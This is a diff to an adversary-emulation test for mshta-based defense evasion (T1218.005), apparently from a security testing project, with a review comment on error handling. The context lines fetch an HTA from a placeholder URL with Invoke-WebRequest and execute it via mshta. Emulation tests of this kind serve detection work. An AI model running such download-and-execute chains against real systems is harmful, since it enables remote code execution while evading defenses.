diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 332e2f06..3fad9a69 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -14998,6 +14998,8 @@ defense-evasion:
 $var =Invoke-WebRequest "#{hta_url}"
 $var.content|out-file "#{temp_file}"
 mshta "#{temp_file}"
+ start-sleep -s 15
+ stop-process -name "calculator" -Force
 cleanup_command: 'remove-item "#{temp_file}" -ErrorAction Ignore '
diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md
index 0810fcc5..423de368 100644
--- a/atomics/T1218.005/T1218.005.md
+++ b/atomics/T1218.005/T1218.005.md
@@ -124,6 +124,8 @@ Execute an arbitrary remote HTA. Upon execution calc.exe will be launched.
 $var =Invoke-WebRequest "#{hta_url}"
 $var.content|out-file "#{temp_file}"
 mshta "#{temp_file}"
+start-sleep -s 15
+stop-process -name "calculator" -Force
 ```
 #### Cleanup Commands:
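Review bot: The added `stop-process -name "calculator" -Force` has no error handling, so the command block ends with an error whenever no process of that exact name exists; the same line appears in both the index.yaml hunk and the T1218.005.md hunk. That can happen if the HTA never launched the calculator, or if the host runs it under a different process name (possibly `calc` or `CalculatorApp` on some Windows builds, to be confirmed per target). The test would then report a failure unrelated to the mshta step being validated. I would write it as `stop-process -name "calculator" -Force -ErrorAction Ignore`, matching the `-ErrorAction Ignore` already used in `cleanup_command`, or move the teardown into `cleanup_command` so the execution result reflects only the technique. Both files look like rendered copies of one test definition outside this diff, so the change presumably belongs there.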